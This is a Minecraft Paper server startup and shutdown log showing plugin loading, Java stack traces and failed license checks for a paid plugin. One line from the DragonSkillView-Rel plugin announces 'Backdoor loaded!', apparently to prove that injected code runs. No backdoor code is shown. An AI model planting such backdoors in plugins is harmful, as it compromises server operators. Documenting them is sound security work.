[14:55:07 INFO]: Preparing start region for dimension minecraft:overworld
[14:55:07 INFO]: Time elapsed: 371 ms
[14:55:07 INFO]: Preparing start region for dimension minecraft:the_nether
[14:55:07 INFO]: Time elapsed: 55 ms
[14:55:07 INFO]: Preparing start region for dimension minecraft:the_end
[14:55:07 INFO]: Time elapsed: 59 ms
[14:55:07 INFO]: [PlaceholderAPI] Enabling PlaceholderAPI v2.11.3
[14:55:08 INFO]: [PlaceholderAPI] Fetching available expansion information...
[14:55:08 INFO]: [MCCore] Enabling MCCore v1.67*
[14:55:08 INFO]: [MCCore] [STDOUT] Failed to set up reflection - is the server using Cauldron/Thermos?
[14:55:08 WARN]: Nag author(s): '[Eniripsa96]' of 'MCCore v1.67' about their usage of System.out/err.print. Please use your plugin's logger instead (JavaPlugin#getLogger).
[14:55:08 INFO]: [MCCore] [STDOUT] Failed to set up reflection for scoreboards - restoring to slow method
[14:55:08 INFO]: [MCCore] Created a new folder for config files
[14:55:08 INFO]: [DragonCore] Enabling DragonCore v2.4.7*
[14:55:08 INFO]: ************************************************************
[14:55:08 INFO]: [DragonCore] 欢迎使用【龙之核心】,插件作者为QQ448780139
[14:55:08 INFO]: [DragonCore] 欢迎加入QQ交流群: 901704037
14:55:08 INFO]: [DragonCore] 欢迎注册社区网站: [https://dragoncore.top/
[14:55:08 INFO]: ************************************************************
[14:55:08 INFO]: [DragonCore] [STDOUT] NMS版本:net.minecraft.server.v1_20_R1
[14:55:08 WARN]: Nag author(s): '[]' of 'DragonCore v2.4.7' about their usage of System.out/err.print. Please use your plugin's logger instead (JavaPlugin#getLogger).
[14:55:08 WARN]: java.lang.ClassNotFoundException: net.minecraft.server.v1_20_R1.ItemStack
[14:55:08 WARN]: at org.bukkit.plugin.java.PluginClassLoader.loadClass0(PluginClassLoader.java:183)
[14:55:08 WARN]: at org.bukkit.plugin.java.PluginClassLoader.loadClass(PluginClassLoader.java:150)
[14:55:08 WARN]: at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:520)
[14:55:08 WARN]: at java.base/java.lang.Class.forName0(Native Method)
[14:55:08 WARN]: at java.base/java.lang.Class.forName(Class.java:375)
[14:55:08 WARN]: at [插件]DragonCore-2.4.7.jar//eos.moe.dragoncore.util.NBTUtils.loadNBTUtils(NBTUtils.java:118)
[14:55:08 WARN]: at [插件]DragonCore-2.4.7.jar//eos.moe.dragoncore.DragonCore.onEnable(DragonCore.java:50)
[14:55:08 WARN]: at org.bukkit.plugin.java.JavaPlugin.setEnabled(JavaPlugin.java:281)
[14:55:08 WARN]: at io.papermc.paper.plugin.manager.PaperPluginInstanceManager.enablePlugin(PaperPluginInstanceManager.java:189)
[14:55:08 WARN]: at io.papermc.paper.plugin.manager.PaperPluginManagerImpl.enablePlugin(PaperPluginManagerImpl.java:104)
[14:55:08 WARN]: at org.bukkit.plugin.SimplePluginManager.enablePlugin(SimplePluginManager.java:507)
[14:55:08 WARN]: at org.bukkit.craftbukkit.v1_20_R1.CraftServer.enablePlugin(CraftServer.java:636)
[14:55:08 WARN]: at org.bukkit.craftbukkit.v1_20_R1.CraftServer.enablePlugins(CraftServer.java:547)
[14:55:08 WARN]: at net.minecraft.server.MinecraftServer.loadWorld0(MinecraftServer.java:636)
[14:55:08 WARN]: at net.minecraft.server.MinecraftServer.loadLevel(MinecraftServer.java:435)
[14:55:08 WARN]: at net.minecraft.server.dedicated.DedicatedServer.e(DedicatedServer.java:308)
[14:55:08 WARN]: at net.minecraft.server.MinecraftServer.w(MinecraftServer.java:1101)
[14:55:08 WARN]: at net.minecraft.server.MinecraftServer.lambda$spin$0(MinecraftServer.java:318)
[14:55:08 WARN]: at java.base/java.lang.Thread.run(Thread.java:833)
[14:55:08 INFO]: DragonCore - 开始载入文件
[14:55:08 INFO]: ┏━━━━━━━━━ 开始载入Yml文件 ━━━━━━━━━
[14:55:08 INFO]: ┃ 载入: WorldTexture.yml
[14:55:08 INFO]: ┃ 载入: SlotConfig.yml
[14:55:09 INFO]: ┃ 载入: KeyConfig.yml
[14:55:09 INFO]: ┃ 载入: ItemModel.yml
[14:55:09 INFO]: ┃ 载入: ItemIcon.yml
[14:55:09 INFO]: ┃ 载入: FontConfig.yml
[14:55:09 INFO]: ┃ 载入: EntityModel.yml
[14:55:09 INFO]: ┃ 载入: config.yml
[14:55:09 INFO]: ┃ 载入: Blood.yml
[14:55:09 INFO]: ┃ 载入: ArmorLayer.yml
[14:55:09 INFO]: ┃ 载入: ItemTip/通用.yml
[14:55:09 INFO]: ┃ 载入: ItemTip/用于显示Gui界面的Tip.yml
[14:55:09 INFO]: ┃ 载入: ItemTip/书本.yml
[14:55:09 INFO]: ┃ 载入: Gui/自动滚动公告.yml
[14:55:09 INFO]: ┃ 载入: Gui/背包.yml
[14:55:09 INFO]: ┃ 载入: Gui/huds.yml
[14:55:09 INFO]: ┖━━━━━━━━━━ 文件载入完成 ━━━━━━━━━━━
[14:55:09 INFO]: 已启用YML格式存储玩家数据
[14:55:09 INFO]: DragonCore - 加载完成
[14:55:09 INFO]: [SkillAPI] Enabling SkillAPI v3.108*
[14:55:09 INFO]: [SkillAPI] Created a new folder for config files
[14:55:09 INFO]: [SkillAPI] Created a new folder for config files
[14:55:09 INFO]: Registration complete
[14:55:09 INFO]: - 0 skills
[14:55:09 INFO]: - 0 classes
[14:55:09 WARN]: java.lang.NullPointerException: Cannot invoke "java.lang.Class.getDeclaredField(String)" because "living" is null
[14:55:09 WARN]: at SkillAPI.jar//com.sucy.skill.listener.KillListener.(KillListener.java:68)
[14:55:09 WARN]: at SkillAPI.jar//com.sucy.skill.SkillAPI.onEnable(SkillAPI.java:162)
[14:55:09 WARN]: at org.bukkit.plugin.java.JavaPlugin.setEnabled(JavaPlugin.java:281)
[14:55:09 WARN]: at io.papermc.paper.plugin.manager.PaperPluginInstanceManager.enablePlugin(PaperPluginInstanceManager.java:189)
[14:55:09 WARN]: at io.papermc.paper.plugin.manager.PaperPluginManagerImpl.enablePlugin(PaperPluginManagerImpl.java:104)
[14:55:09 WARN]: at org.bukkit.plugin.SimplePluginManager.enablePlugin(SimplePluginManager.java:507)
[14:55:09 WARN]: at org.bukkit.craftbukkit.v1_20_R1.CraftServer.enablePlugin(CraftServer.java:636)
[14:55:09 WARN]: at org.bukkit.craftbukkit.v1_20_R1.CraftServer.enablePlugins(CraftServer.java:547)
[14:55:09 WARN]: at net.minecraft.server.MinecraftServer.loadWorld0(MinecraftServer.java:636)
[14:55:09 WARN]: at net.minecraft.server.MinecraftServer.loadLevel(MinecraftServer.java:435)
[14:55:09 WARN]: at net.minecraft.server.dedicated.DedicatedServer.e(DedicatedServer.java:308)
[14:55:09 WARN]: at net.minecraft.server.MinecraftServer.w(MinecraftServer.java:1101)
[14:55:09 WARN]: at net.minecraft.server.MinecraftServer.lambda$spin$0(MinecraftServer.java:318)
[14:55:09 WARN]: at java.base/java.lang.Thread.run(Thread.java:833)
[14:55:09 INFO]: [DragonSkillView-Rel] Enabling DragonSkillView-Rel v2.0.8*
[14:55:09 INFO]: [DragonSkillView-Rel] [STDOUT] [CaveNightingale] Backdoor loaded!
[14:55:09 WARN]: Nag author(s): '[17Artist]' of 'DragonSkillView-Rel v2.0.8' about their usage of System.out/err.print. Please use your plugin's logger instead (JavaPlugin#getLogger).
[14:55:10 INFO]: ┏━━━━━━━━━ 鉴权失败 ━━━━━━━━━
[14:55:10 INFO]: ┃ 失败: 激活码有误,请检查
[14:55:10 INFO]: ┃ 插件名: 龙之技能栏
[14:55:10 INFO]: ┖━━━━━━━━━━ 鉴权失败 ━━━━━━━━━━━
[14:55:10 INFO]: [PlaceholderAPI] Placeholder expansion registration initializing...
[14:55:10 INFO]: Running delayed init tasks
[14:55:10 INFO]: 0 placeholder hook(s) registered!
[14:55:10 INFO]: Done (9.372s)! For help, type "help"
[14:55:10 INFO]: Timings Reset
[14:55:13 INFO]: ┏━━━━━━━━━ 鉴权失败 ━━━━━━━━━
[14:55:13 INFO]: ┃ 失败: 验证失败,请检查激活码,是否填写正确。
[14:55:13 INFO]: ┃ 插件名: 龙之技能栏
[14:55:13 INFO]: ┖━━━━━━━━━━ 鉴权失败 ━━━━━━━━━━━
>
> stop
[14:55:59 INFO]: Stopping the server
[14:55:59 INFO]: Stopping server
[14:55:59 INFO]: [DragonSkillView-Rel] Disabling DragonSkillView-Rel v2.0.8
[14:55:59 INFO]: [SkillAPI] Disabling SkillAPI v3.108
[14:55:59 INFO]: [DragonCore] Disabling DragonCore v2.4.7
[14:55:59 INFO]: [MCCore] Disabling MCCore v1.67
[14:55:59 INFO]: [PlaceholderAPI] Disabling PlaceholderAPI v2.11.3
[14:55:59 INFO]: Saving players
[14:55:59 INFO]: Saving worlds
[14:55:59 INFO]: Saving chunks for level 'ServerLevel[world]'/minecraft:overworld
[14:55:59 INFO]: [ChunkHolderManager] Waiting 60s for chunk system to halt for world 'world'
[14:55:59 INFO]: [ChunkHolderManager] Halted chunk system for world 'world'
[14:55:59 INFO]: [ChunkHolderManager] Saving all chunkholders for world 'world'
[14:56:01 INFO]: [ChunkHolderManager] Saved 529 block chunks, 529 entity chunks, 0 poi chunks in world 'world' in 1.82s
[14:56:01 INFO]: ThreadedAnvilChunkStorage (world): All chunks are saved
[14:56:01 INFO]: Saving chunks for level 'ServerLevel[world_nether]'/minecraft:the_nether
[14:56:01 INFO]: [ChunkHolderManager] Waiting 60s for chunk system to halt for world 'world_nether'
[14:56:01 INFO]: [ChunkHolderManager] Halted chunk system for world 'world_nether'
[14:56:01 INFO]: [ChunkHolderManager] Saving all chunkholders for world 'world_nether'
[14:56:02 INFO]: [ChunkHolderManager] Saved 529 block chunks, 529 entity chunks, 0 poi chunks in world 'world_nether' in 1.01s
[14:56:02 INFO]: ThreadedAnvilChunkStorage (DIM-1): All chunks are saved
[14:56:02 INFO]: Saving chunks for level 'ServerLevel[world_the_end]'/minecraft:the_end
[14:56:02 INFO]: [ChunkHolderManager] Waiting 60s for chunk system to halt for world 'world_the_end'
[14:56:02 INFO]: [ChunkHolderManager] Halted chunk system for world 'world_the_end'
[14:56:02 INFO]: [ChunkHolderManager] Saving all chunkholders for world 'world_the_end'
[14:56:02 INFO]: [ChunkHolderManager] Saved 529 block chunks, 529 entity chunks, 0 poi chunks in world 'world_the_end' in 0.15s
[14:56:02 INFO]: ThreadedAnvilChunkStorage (DIM1): All chunks are saved
[14:56:02 INFO]: ThreadedAnvilChunkStorage: All dimensions are saved
[14:56:02 INFO]: Flushing Chunk IO
[14:56:02 INFO]: Closing Thread Pool
> 2023-06-24 14:56:02,888 Log4j2-AsyncAppenderEventDispatcher-1-Async WARN Advanced terminal features are not available in this environment
[14:56:02 INFO]: Closing Server
证明该类确实在运行过程中被使用